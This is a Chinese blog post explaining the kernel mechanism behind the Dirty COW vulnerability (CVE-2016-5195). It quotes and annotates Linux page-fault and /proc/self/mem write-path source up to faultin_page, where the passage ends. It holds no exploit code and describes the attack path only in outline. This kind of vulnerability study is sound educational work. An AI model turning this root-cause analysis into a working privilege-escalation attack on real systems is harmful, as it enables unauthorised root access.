前言
cve-2016-5195
就是非常有名的 dirty cow
,早就听说过其优雅性,在之前也在靶场利用过,但那时只是在网上找了个利用脚本,并没有对相关漏洞原理进行分析。所以再次打算简要分析该漏洞产生的原理与简单利用。
注:本文重在记录漏洞触发链,不探索 dirty cow
的具体利用方式
默认读者了解或熟悉:COW
机制、页表机制、mmap
内存映射、page cache
等知识。
这里提一嘴,mmap
进行映射时,只是在匿名映射与文件映射区划分了一块 vma
,但这时并没有分配物理内存,即对应的 pte
为空;在实际访问时,会触发 page fault
,在缺页处理过程中会为其分配物理页面并更新 pte
。
缺页异常处理大致流程
大致处理流程如下:
//__do_page_fault()
// __handle_mm_fault()
// handle_pte_fault()
// do_wp_page() ==> pte在主存中,写缺页
// do_fault() ==> pte不在主存中,及第一次非匿名页处理流程
// do_read_fault()
// do_cow_fault() ==> 写操作引起的缺页错误
// do_shared_fault()
__do_page_fault
/*
* This routine handles page faults. It determines the address,
* and the problem, and then passes it off to one of the appropriate
* routines.
*
* This function must have noinline because both callers
* {,trace_}do_page_fault() have notrace on. Having this an actual function
* guarantees there's a function trace entry.
*/
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
unsigned long address)
{
struct vm_area_struct *vma;
struct task_struct *tsk;
struct mm_struct *mm;
int fault, major = 0;
// 设置允许重试标志和可杀死进程标志
unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;
tsk = current;
mm = tsk->mm;
/*
* Detect and handle instructions that would cause a page fault for
* both a tracked kernel page and a userspace page.
*/
if (kmemcheck_active(regs))
kmemcheck_hide(regs);
prefetchw(&mm->mmap_sem); // 预取指令
if (unlikely(kmmio_fault(regs, address)))
return;
/*
* We fault-in kernel-space virtual memory on-demand. The
* 'reference' page table is init_mm.pgd.
*
* NOTE! We MUST NOT take any locks for this case. We may
* be in an interrupt or a critical region, and should
* only copy the information from the master page table,
* nothing more.
*
* This verifies that the fault happens in kernel space
* (error_code & 4) == 0, and that the fault was not a
* protection error (error_code & 9) == 0.
*/
// address 处于内核空间
if (unlikely(fault_in_kernel_space(address))) {
if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {
// PF_RSVD: 页面保留,不能分配给进程
// PF_USER: 页面是用户空间,不可被内核访问
// PF_PROT: 页面只读
if (vmalloc_fault(address) >= 0)
return;
if (kmemcheck_fault(regs, address, error_code))
return;
}
/* Can handle a stale RO->RW TLB: */
// 是否是虚假页面错误
if (spurious_fault(error_code, address))
return;
/* kprobes don't want to hook the spurious faults: */
if (kprobes_fault(regs))
return;
/*
* Don't take the mm semaphore here. If we fixup a prefetch
* fault we could otherwise deadlock:
*/
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
// address 处于用户空间
/* kprobes don't want to hook the spurious faults: */
if (unlikely(kprobes_fault(regs)))
return;
if (unlikely(error_code & PF_RSVD)) // 页面保留
pgtable_bad(regs, error_code, address);
if (unlikely(smap_violation(error_code, regs))) { // smap 保护
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
/*
* If we're in an interrupt, have no user context or are running
* in a region with pagefaults disabled then we must not take the fault
*/
if (unlikely(faulthandler_disabled() || !mm)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
/*
* It's safe to allow irq's after cr2 has been saved and the
* vmalloc fault has been handled.
*
* User-mode registers count as a user access even for any
* potential system fault or CPU buglet:
*/
// 寄存器处于用户态
if (user_mode(regs)) {
local_irq_enable(); // 开启本地中断
error_code |= PF_USER; // 添加 PF_USER 标志
flags |= FAULT_FLAG_USER;
} else {
if (regs->flags & X86_EFLAGS_IF)
local_irq_enable();
}
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
if (error_code & PF_WRITE) // 写错误
flags |= FAULT_FLAG_WRITE;
if (error_code & PF_INSTR)
flags |= FAULT_FLAG_INSTRUCTION;
/*
* When running in the kernel we expect faults to occur only to
* addresses in user space. All other faults represent errors in
* the kernel and should generate an OOPS. Unfortunately, in the
* case of an erroneous fault occurring in a code path which already
* holds mmap_sem we will deadlock attempting to validate the fault
* against the address space. Luckily the kernel only validly
* references user space from well defined areas of code, which are
* listed in the exceptions table.
*
* As the vast majority of faults will be valid we will only perform
* the source reference check when there is a possibility of a
* deadlock. Attempt to lock the address space, if we cannot we then
* validate the source. If this is invalid we can skip the address
* space check, thus avoiding the deadlock:
*/
// 上锁
if (unlikely(!down_read_trylock(&mm->mmap_sem))) { // 上锁失败
if ((error_code & PF_USER) == 0 &&
!search_exception_tables(regs->ip)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
retry:
down_read(&mm->mmap_sem);
} else {
/*
* The above down_read_trylock() might have succeeded in
* which case we'll have missed the might_sleep() from
* down_read():
*/
might_sleep();
}
vma = find_vma(mm, address); // 寻找 address 处于的 vma
if (unlikely(!vma)) { // 没找到,直接 kill
bad_area(regs, error_code, address);
return;
}
if (likely(vma->vm_start <= address)) // address 位于该 vma
goto good_area;
if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) { // 堆栈,如果不存在 VM_GROWSDOWN 标志,直接 kill
bad_area(regs, error_code, address);
return;
}
if (error_code & PF_USER) {
/*
* Accessing the stack below %sp is always a bug.
* The large cushion allows instructions like enter
* and pusha to work. ("enter $65535, $31" pushes
* 32 pointers and then decrements %sp by 65535.)
*/
if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
bad_area(regs, error_code, address);
return;
}
}
if (unlikely(expand_stack(vma, address))) { // 扩展堆栈
bad_area(regs, error_code, address);
return;
}
/*
* Ok, we have a good vm_area for this memory access, so
* we can handle it..
*/
good_area: // 运行到这里,说明是正常的缺页异常,address 属于进程的地址空间,此时进行请求调页,分配物理内存
if (unlikely(access_error(error_code, vma))) {
bad_area_access_error(regs, error_code, address, vma);
return;
}
/*
* If for any reason at all we couldn't handle the fault,
* make sure we exit gracefully rather than endlessly redo
* the fault. Since we never set FAULT_FLAG_RETRY_NOWAIT, if
* we get VM_FAULT_RETRY back, the mmap_sem has been unlocked.
*/
// 分配物理页的核心函数
fault = handle_mm_fault(mm, vma, address, flags);
major |= fault & VM_FAULT_MAJOR;
/*
* If we need to retry the mmap_sem has already been released,
* and if there is a fatal signal pending there is no guarantee
* that we made any progress. Handle this case first.
*/
if (unlikely(fault & VM_FAULT_RETRY)) { // 是否允许重试,但是最多一次
/* Retry at most once */
if (flags & FAULT_FLAG_ALLOW_RETRY) {
flags &= ~FAULT_FLAG_ALLOW_RETRY; // 去除允许重试标志
flags |= FAULT_FLAG_TRIED;
if (!fatal_signal_pending(tsk))
goto retry;
}
/* User mode? Just return to handle the fatal exception */
if (flags & FAULT_FLAG_USER)
return;
/* Not returning to user mode? Handle exceptions or die: */
no_context(regs, error_code, address, SIGBUS, BUS_ADRERR);
return;
}
up_read(&mm->mmap_sem);
if (unlikely(fault & VM_FAULT_ERROR)) {
mm_fault_error(regs, error_code, address, vma, fault);
return;
}
/*
* Major/minor page fault accounting. If any of the events
* returned VM_FAULT_MAJOR, we account it as a major fault.
*/
if (major) {
tsk->maj_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
} else {
tsk->min_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
}
check_v8086_mode(regs, address, tsk);
}
NOKPROBE_SYMBOL(__do_page_fault);
大致流程:
- 判断
address
是位于内核地址空间还是用户地址空间 - 位于内核地址空间:
- 满足相关条件,进行
vmalloc_fault
处理
- 满足相关条件,进行
- 位于用户地址空间:
- 写错误,设置
FAULT_FLAG_WRITE
标志 - 满足条件,进行
handle_mm_fault
处理
- 写错误,设置
handle_mm_fault ==> __handle_mm_fault
handle_mm_fault
主要调用了 __handle_mm_fault
函数:
/*
* By the time we get here, we already hold the mm semaphore
*
* The mmap_sem may have been released depending on flags and our
* return value. See filemap_fault() and __lock_page_or_retry().
*/
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)
{
// 四级页表结构
pgd_t *pgd;
pud_t *pud;
pmd_t *pmd;
pte_t *pte;
if (!arch_vma_access_permitted(vma, flags & FAULT_FLAG_WRITE,
flags & FAULT_FLAG_INSTRUCTION,
flags & FAULT_FLAG_REMOTE))
return VM_FAULT_SIGSEGV;
if (unlikely(is_vm_hugetlb_page(vma)))
return hugetlb_fault(mm, vma, address, flags);
pgd = pgd_offset(mm, address); // 获取全局页表项地址
pud = pud_alloc(mm, pgd, address); // 分配上级页表项
if (!pud)
return VM_FAULT_OOM;
pmd = pmd_alloc(mm, pud, address); // 分配中间目录项
if (!pmd)
return VM_FAULT_OOM;
if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
int ret = create_huge_pmd(mm, vma, address, pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
pmd_t orig_pmd = *pmd;
int ret;
barrier();
if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
unsigned int dirty = flags & FAULT_FLAG_WRITE;
if (pmd_protnone(orig_pmd))
return do_huge_pmd_numa_page(mm, vma, address,
orig_pmd, pmd);
if (dirty && !pmd_write(orig_pmd)) {
ret = wp_huge_pmd(mm, vma, address, pmd,
orig_pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(mm, vma, address, pmd,
orig_pmd, dirty);
return 0;
}
}
}
/*
* Use pte_alloc() instead of pte_alloc_map, because we can't
* run pte_offset_map on the pmd, if an huge pmd could
* materialize from under us from a different thread.
*/
if (unlikely(pte_alloc(mm, pmd, address)))
return VM_FAULT_OOM;
/*
* If a huge pmd materialized under us just retry later. Use
* pmd_trans_unstable() instead of pmd_trans_huge() to ensure the pmd
* didn't become pmd_trans_huge under us and then back to pmd_none, as
* a result of MADV_DONTNEED running immediately after a huge pmd fault
* in a different thread of this mm, in turn leading to a misleading
* pmd_trans_huge() retval. All we have to ensure is that it is a
* regular pmd that we can walk with pte_offset_map() and we can do that
* through an atomic read in C, which is what pmd_trans_unstable()
* provides.
*/
if (unlikely(pmd_trans_unstable(pmd) || pmd_devmap(*pmd)))
return 0;
/*
* A regular pmd is established and it can't morph into a huge pmd
* from under us anymore at this point because we hold the mmap_sem
* read mode and khugepaged takes it in write mode. So now it's
* safe to run pte_offset_map().
*/
pte = pte_offset_map(pmd, address); // 获取页表项
return handle_pte_fault(mm, vma, address, pte, pmd, flags); //核心处理函数
}
大致流程:
- 分配各级页表项,并获取页表项
- 正常的话,最后进行
handle_pte_fault
缺页处理
handle_pte_fault
/*
* These routines also need to handle stuff like marking pages dirty
* and/or accessed for architectures that don't do it in hardware (most
* RISC architectures). The early dirtying is also good on the i386.
*
* There is also a hook called "update_mmu_cache()" that architectures
* with external mmu caches can use to update those (ie the Sparc or
* PowerPC hashed page tables that act as extended TLBs).
*
* We enter with non-exclusive mmap_sem (to exclude vma changes,
* but allow concurrent faults), and pte mapped but not yet locked.
* We return with pte unmapped and unlocked.
*
* The mmap_sem may have been released depending on flags and our
* return value. See filemap_fault() and __lock_page_or_retry().
*/
static int handle_pte_fault(struct mm_struct *mm,
struct vm_area_struct *vma, unsigned long address,
pte_t *pte, pmd_t *pmd, unsigned int flags)
{
pte_t entry;
spinlock_t *ptl;
/*
* some architectures can have larger ptes than wordsize,
* e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
* so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
* The code below just needs a consistent view for the ifs and
* we later double check anyway with the ptl lock held. So here
* a barrier will do.
*/
entry = *pte; // 获取页表项内容
barrier();
// 该页不在主存中
if (!pte_present(entry)) {
if (pte_none(entry)) { // pte为空,表示第一次访问该页
if (vma_is_anonymous(vma)) // 匿名页处理
return do_anonymous_page(mm, vma, address,
pte, pmd, flags);
else
return do_fault(mm, vma, address, pte, pmd,
flags, entry); // 非匿名页处理
}
// pte 不为空,说明之前访问过该页,从交换区加载该页
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}
// 该页在主存中
if (pte_protnone(entry))
return do_numa_page(mm, vma, address, entry, pte, pmd);
ptl = pte_lockptr(mm, pmd);
spin_lock(ptl); // 上自旋锁
if (unlikely(!pte_same(*pte, entry))) // 并发检查
goto unlock;
if (flags & FAULT_FLAG_WRITE) { // 写错误,FAULT_FLAG_WRITE
if (!pte_write(entry)) // 页不可写
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry); // 进行COW,将内容写入由 do_fault()->do_cow_fault()分配的内存页中
entry = pte_mkdirty(entry); // 脏页
}
entry = pte_mkyoung(entry); // 清除 dirty 标志
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte); //pte 内容发生变化,将新内容写入 pte 页表项中
} else {
/*
* This is needed only for protection faults but the arch code
* is not yet telling us if this is a protection fault or not.
* This still avoids useless tlb flushes for .text page faults
* with threads.
*/
if (flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(vma, address);
}
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
}
大致流程:
- 获取页表项中的内存页
- 该页不在主存中
-
pte
页表项为空- 匿名页,则进行
do_anonymous_page
处理 - 非匿名页,则进行
do_fault
处理
- 匿名页,则进行
-
pet
页表项不为空- 从交换区将页面换回主存
-
- 该页在主存中
- 缺页写错误
- 对应页不可写,调用
do_wp_page
进行COW
- 对应页可写,标脏
- 对应页不可写,调用
- 非缺页写错误
- 更新
pte
页表项
- 更新
- 缺页写错误
- 该页不在主存中
do_fault == 非匿名页处理
/*
* We enter with non-exclusive mmap_sem (to exclude vma changes,
* but allow concurrent faults).
* The mmap_sem may have been released depending on flags and our
* return value. See filemap_fault() and __lock_page_or_retry().
*/
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
unsigned int flags, pte_t orig_pte)
{
pgoff_t pgoff = linear_page_index(vma, address);
pte_unmap(page_table);
/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
if (!vma->vm_ops->fault)
return VM_FAULT_SIGBUS;
if (!(flags & FAULT_FLAG_WRITE)) // 非写缺页
return do_read_fault(mm, vma, address, pmd, pgoff, flags,
orig_pte);
if (!(vma->vm_flags & VM_SHARED)) // 非共享映射
return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
orig_pte);
return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte); // 共享映射
}
大致流程:
- 由读操作引起的缺页,则进行
do_read_fault
处理 - 由写私有映射引起的缺页,则进行
do_cow_fault
处理 - 其他操作引起的缺页,则进行
do_shared_fault
处理
do_cow_fault
static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd,
pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
struct page *fault_page, *new_page;
struct mem_cgroup *memcg;
spinlock_t *ptl;
pte_t *pte;
int ret;
if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;
new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address); // 分配一个新的物理页
if (!new_page)
return VM_FAULT_OOM;
if (mem_cgroup_try_charge(new_page, mm, GFP_KERNEL, &memcg, false)) {
put_page(new_page);
return VM_FAULT_OOM;
}
ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page); // 将文件内容读取到 fault_page 中
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;
if (fault_page)
copy_user_highpage(new_page, fault_page, address, vma); // 将fault_page的内容复制到new_page中
__SetPageUptodate(new_page);
pte = pte_offset_map_lock(mm, pmd, address, &ptl); // 原子的获取 pte ???
if (unlikely(!pte_same(*pte, orig_pte))) { // 并发检查
pte_unmap_unlock(pte, ptl);
if (fault_page) {
unlock_page(fault_page);
put_page(fault_page);
} else {
/*
* The fault handler has no page to lock, so it holds
* i_mmap_lock for read to protect against truncate.
*/
i_mmap_unlock_read(vma->vm_file->f_mapping);
}
goto uncharge_out;
}
//设置pte,置换该进程中的pte表项,对于写操作会将该页标脏
//函数将页面表项 (PTE) 设置为指向给定页面的新页面。该函数首先检查 PTE 是否存在。如果不存在,则函数会创建一个新的 PTE。
//然后,函数将 PTE 设置为指向新页面。最后,函数将 PTE 标记为已修改。
do_set_pte(vma, address, new_page, pte, true, true);
mem_cgroup_commit_charge(new_page, memcg, false, false);
lru_cache_add_active_or_unevictable(new_page, vma);
pte_unmap_unlock(pte, ptl);
if (fault_page) {
unlock_page(fault_page);
put_page(fault_page); // 释放 fault_page
} else {
/*
* The fault handler has no page to lock, so it holds
* i_mmap_lock for read to protect against truncate.
*/
i_mmap_unlock_read(vma->vm_file->f_mapping);
}
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg, false);
put_page(new_page);
return ret;
}
大致流程:
- 分配一个新的页
- 更新页表项
注:此时还没有开始写内容
do_wp_page
static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
spinlock_t *ptl, pte_t orig_pte)
__releases(ptl)
{
struct page *old_page;
old_page = vm_normal_page(vma, address, orig_pte);
if (!old_page) {
/*
* VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
* VM_PFNMAP VMA.
*
* We should not cow pages in a shared writeable mapping.
* Just mark the pages writable and/or call ops->pfn_mkwrite.
*/
if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))
return wp_pfn_shared(mm, vma, address, page_table, ptl,
orig_pte, pmd);
pte_unmap_unlock(page_table, ptl);
return wp_page_copy(mm, vma, address, page_table, pmd,
orig_pte, old_page);
}
/*
* Take out anonymous pages first, anonymous shared vmas are
* not dirty accountable.
*/
// 处理匿名页
if (PageAnon(old_page) && !PageKsm(old_page)) {
int total_mapcount;
if (!trylock_page(old_page)) { // 并发
get_page(old_page);
pte_unmap_unlock(page_table, ptl);
lock_page(old_page);
page_table = pte_offset_map_lock(mm, pmd, address,
&ptl);
if (!pte_same(*page_table, orig_pte)) {
unlock_page(old_page);
pte_unmap_unlock(page_table, ptl);
put_page(old_page);
return 0;
}
put_page(old_page);
}
// 真正开始处理流程
// 其中首先通过reuse_swap_page判断是否只有一个进程在使用该页,如果是则直接调用wp_page_reuse函数重用该页
if (reuse_swap_page(old_page, &total_mapcount)) {
if (total_mapcount == 1) {
/*
* The page is all ours. Move it to
* our anon_vma so the rmap code will
* not search our parent or siblings.
* Protected against the rmap code by
* the page lock.
*/
page_move_anon_rmap(compound_head(old_page),
vma, address);
}
unlock_page(old_page);
//一般的cow流程会走到这里,重用由do_cow_fault()分配好的内存页,不会再开辟新页
return wp_page_reuse(mm, vma, address, page_table, ptl,
orig_pte, old_page, 0, 0);
}
unlock_page(old_page);
} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))) {
return wp_page_shared(mm, vma, address, page_table, pmd,
ptl, orig_pte, old_page);
}
/*
* Ok, we need to copy. Oh, well..
*/
get_page(old_page);
pte_unmap_unlock(page_table, ptl);
return wp_page_copy(mm, vma, address, page_table, pmd,
orig_pte, old_page);
}
COW 与 缺页
当我们使用 mmap
映射一个只读文件,随后开辟一个新进程,尝试通过 /proc/self/mem
文件直接往一个原有的共享页面写入内容时,会调用对应函数表中的 mem_write
函数:
static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};
其中 mem_write
其实就是对 mem_rw
的一个封装:
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1);
}
mem_rw
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
struct mm_struct *mm = file->private_data;
unsigned long addr = *ppos;
ssize_t copied;
char *page;
if (!mm)
return 0;
page = (char *)__get_free_page(GFP_TEMPORARY);// 分配临时的空闲内存页
if (!page)
return -ENOMEM;
copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users))
goto free;
while (count > 0) {
int this_len = min_t(int, count, PAGE_SIZE);
// 如果是写入操作,将用户内存空间数据拷贝到临时内存页上
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
// access_remote_vm() 进行内存访问操作
this_len = access_remote_vm(mm, addr, page, this_len, write);
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
// 如果操作读操作,此时待读出数据已经被读到了临时页面上,将其拷回用户空间
if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}
buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;
mmput(mm);
free://释放临时内存页
free_page((unsigned long) page);
return copied;
}
大致流程如下:
- 调用
__get_free_page()
分配一个空闲的内存页作为临时储存用户数据的空间 - 调用
access_remote_vm()
函数进行内存访问操作,根据传入的write
参数进行读/写内存页面操作
access_remote_vm
其实又是对 __access_remote_vm
的封装:
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)
{
return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
__access_remote_vm
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
struct vm_area_struct *vma;
void *old_buf = buf;
down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
//获取操作(从...读取/向...写入)对应的目标内存页
ret = get_user_pages_remote(tsk, mm, addr, 1,
write, 1, &page, &vma);
if (ret <= 0) { // 失败
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;
// 利用 kmap 为获取到的页面建立临时映射,因为我们获取的是 page 结构体,需要映射到一个虚拟地址之后才能进行写入
maddr = kmap(page);
if (write) {
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes); // 向对应内存页写入数据
set_page_dirty_lock(page);
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes); // 从对应内存页读取数据
}
kunmap(page);
put_page(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);
return buf - old_buf;
}
大致流程:
- 通过
get_user_pages_remote()
获取到对应的内存页(注意这里获取的是page
结构体,因为该物理页不一定有映射) - 通过
kmap()
或许到该内存页映射到的虚拟地址(若无则会建立新的临时映射) - 通过
copy_from_user_page()/copy_to_user_page()
读/写对应的内存页
我分析的代码跟网上的好像有些许不同,不知道是内核版本不同,还是我分析的是 patch 的代码,不管了
get_user_pages_remote
是 __get_user_pages_locked
的封装:
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
int write, int force, struct page **pages,
struct vm_area_struct **vmas)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
pages, vmas, NULL, false,
FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);
而 __get_user_pages_locked
最后会调用到 __get_user_pages
:
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
struct mm_struct *mm,
unsigned long start,
unsigned long nr_pages,
int write, int force,
struct page **pages,
struct vm_area_struct **vmas,
int *locked, bool notify_drop,
unsigned int flags)
{
long ret, pages_done;
bool lock_dropped;
if (locked) {
/* if VM_FAULT_RETRY can be returned, vmas become invalid */
BUG_ON(vmas);
/* check caller initialized locked */
BUG_ON(*locked != 1);
}
if (pages)
flags |= FOLL_GET;
if (write)
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;
pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
......
注:写入时,会设置 FOLL_WRITE
标志
__get_user_pages
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
long i = 0;
unsigned int page_mask;
struct vm_area_struct *vma = NULL;
if (!nr_pages)
return 0;
VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));
/*
* If FOLL_FORCE is set then do not force a full fault as the hinting
* fault information is unrelated to the reference behaviour of a task
* using the address space
*/
if (!(gup_flags & FOLL_FORCE))
gup_flags |= FOLL_NUMA;
do {
struct page *page;
unsigned int foll_flags = gup_flags;
unsigned int page_increm;
/* first iteration or cross vma bound */
if (!vma || start >= vma->vm_end) {
vma = find_extend_vma(mm, start);
if (!vma && in_gate_area(mm, start)) {
int ret;
ret = get_gate_page(mm, start & PAGE_MASK,
gup_flags, &vma,
pages ? &pages[i] : NULL);
if (ret)
return i ? : ret;
page_mask = 0;
goto next_page;
}
if (!vma || check_vma_flags(vma, gup_flags))
return i ? : -EFAULT;
if (is_vm_hugetlb_page(vma)) {
i = follow_hugetlb_page(mm, vma, pages, vmas,
&start, &nr_pages, i,
gup_flags);
continue;
}
}
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask); // 获取虚拟地址对应的物理页(page结构体)
if (!page) {// 失败了
/*
/* 两种原因:
* (1) 不存在对应的物理页(未与物理页见建立相应的映射关系)
* (2) 存在这样的物理页,但是没有相应的操作权限(如该页不可写)
* 在 COW 流程中会先走(1),然后走(2)
*/
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);//【核心】处理缺页异常
switch (ret) {
case 0:
goto retry;//成功处理缺页异常,回去重新尝试调页
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;
start += page_increm * PAGE_SIZE;
nr_pages -= page_increm;
} while (nr_pages);
return i;
}
EXPORT_SYMBOL(__get_user_pages);
COW
的两个要点:
- 在最开始说过,
mmap
进行映射时并没有建立起该页与对应物理页间的映射,只是单纯分配了虚拟地址而言;所以此时follow_page_mask
返回 NULL;由于没获取到对应内存页,接下来调用faultin_page()
函数解决缺页异常,分配物理页 - 调用
faultin_page
函数成功解决缺页异常之后会回到retry
标签,接下来会重新调用follow_page_mask
,而若是当前进程对于该页没有写权限,则还是会返回NULL;由于没获取到对应内存页,接下来调用faultin_page
函数解决缺页异常,进行写时复制
faultin_page
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, int *nonblocking)
{
struct mm_struct *mm = vma->vm_mm;
unsigned int fault_flags = 0;
int ret;
/* mlock all present pages, but do not fault in new pages */
if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
return -ENOENT;
/* For mm_populate(), just skip the stack guard page. */
if ((*flags & FOLL_POPULATE) &&
(stack_guard_page_start(vma, address) ||
stack_guard_page_end(vma, address + PAGE_SIZE)))
return -ENOENT;
if (*flags & FOLL_WRITE) //因为我们要写入该页,所以该标志位存在
fault_flags |= FAULT_FLAG_WRITE;
if (*flags & FOLL_REMOTE)
fault_flags |= FAULT_FLAG_REMOTE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}
ret = handle_mm_fault(mm, vma, address, fault_flags); // 缺页处理
if (ret & VM_FAULT_ERROR) {
if (ret & VM_FAULT_OOM)
return -ENOMEM;
if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
return -EFAULT;
BUG();
}
if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}
if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}
/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
